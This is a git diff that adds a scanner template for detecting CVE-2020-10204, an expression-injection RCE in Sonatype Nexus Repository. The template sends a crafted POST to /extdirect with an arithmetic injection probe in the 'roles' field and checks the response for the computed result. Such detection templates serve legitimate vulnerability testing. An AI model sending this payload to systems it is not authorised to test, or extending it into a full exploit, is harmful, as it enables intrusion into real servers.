diff --git a/cves/CVE-2020-10204.yaml b/cves/CVE-2020-10204.yaml
new file mode 100644
index 0000000000..3d1073d436
--- /dev/null
+++ b/cves/CVE-2020-10204.yaml
@@ -0,0 +1,24 @@
+id: CVE-2020-10204
+
+info:
+  name: Sonatype Nexus Repository RCE
+  auhtor: hetroublemakr
+  severity: high
+  # reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/extdirect'
+
+    body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "1787569"
+        part: body
+      - type: status
+        status:
+          - 200
\ No newline at end of file